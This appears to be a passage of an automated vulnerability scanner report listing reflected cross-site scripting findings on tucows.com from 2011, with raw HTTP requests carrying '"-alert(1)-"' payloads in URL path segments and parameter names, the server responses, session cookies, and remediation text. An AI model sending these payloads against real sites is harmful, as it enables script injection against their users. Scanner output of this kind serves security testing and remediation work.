GET /images/newassets/includesb3dce"-alert(1)-"df3be201d5f/js/yetii.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:36 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53589"-alert(1)-"260f69e5fea was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js53589"-alert(1)-"260f69e5fea/yetii.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:46 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d6bc"-alert(1)-"8adb3574f02 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/yetii.js2d6bc"-alert(1)-"8adb3574f02 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:58 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.297. http://www.tucows.com/images/newassets/includes/js/yetii.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/images/newassets/includes/js/yetii.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 772af"-alert(1)-"9c97d81b22b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/yetii.js?772af"-alert(1)-"9c97d81b22b=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:02 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e824"-alert(1)-"ef3735f6727 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images4e824"-alert(1)-"ef3735f6727/newassets/includes/themes/03BlueMeany/style.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:11 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5359"-alert(1)-"a9fa148b261 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassetse5359"-alert(1)-"a9fa148b261/includes/themes/03BlueMeany/style.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:19 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 175cb"-alert(1)-"c07ddec345e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes175cb"-alert(1)-"c07ddec345e/themes/03BlueMeany/style.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:28 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5bed4"-alert(1)-"bc0cdf6abcf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/themes5bed4"-alert(1)-"bc0cdf6abcf/03BlueMeany/style.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:39 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7990"-alert(1)-"6641f3a44d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/themes/03BlueMeanyf7990"-alert(1)-"6641f3a44d/style.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:48 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b53b3"-alert(1)-"2154049023 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/themes/03BlueMeany/style.cssb53b3"-alert(1)-"2154049023 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:59 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 329b8"-alert(1)-"ca5ec70f733 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/themes/03BlueMeany/style.css?329b8"-alert(1)-"ca5ec70f733=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:25:56 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d20f"-alert(1)-"fab829ca50f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images6d20f"-alert(1)-"fab829ca50f/newassets/includes/themes/03BlueMeany/styles.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:10 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b37a5"-alert(1)-"3c4c9d14a1d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassetsb37a5"-alert(1)-"3c4c9d14a1d/includes/themes/03BlueMeany/styles.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:18 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc3ab"-alert(1)-"412e4b918b2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
